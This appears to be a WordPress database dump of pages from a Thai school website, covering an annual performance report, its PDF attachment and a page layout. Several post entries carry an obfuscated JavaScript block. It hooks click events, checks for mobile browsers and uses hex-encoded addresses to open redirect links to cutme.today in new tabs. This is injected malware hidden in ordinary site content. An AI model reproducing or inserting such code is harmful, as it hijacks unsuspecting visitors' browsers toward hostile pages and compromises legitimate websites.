_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการปฏิบัติงานประจำปี','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b','','','2024-08-08 16:06:50','2024-08-08 09:06:50','',0,'http://pakhaeng.ssk.in.th/?page_id=703',0,'page','',0),
(704,1,'2024-08-08 16:01:03','2024-08-08 09:01:03','','รายงานผลการปฏิบัติงานประจำปี','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b','','','2024-08-08 16:01:03','2024-08-08 09:01:03','',703,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf',0,'attachment','application/pdf',0),
(705,1,'2024-08-08 16:02:04','2024-08-08 09:02:04','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":704,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการปฏิบัติงานประจำปี\"></object><a id=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการปฏิบัติงานประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการปฏิบัติงานประจำปี.pdf','','inherit','closed','closed','','703-revision-v1','','','2024-08-08 16:02:04','2024-08-08 09:02:04','',703,'http://pakhaeng.ssk.in.th/?p=705',0,'revision','',0),
(706,1,'2024-08-08 16:02:50','2024-08-08 09:02:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn 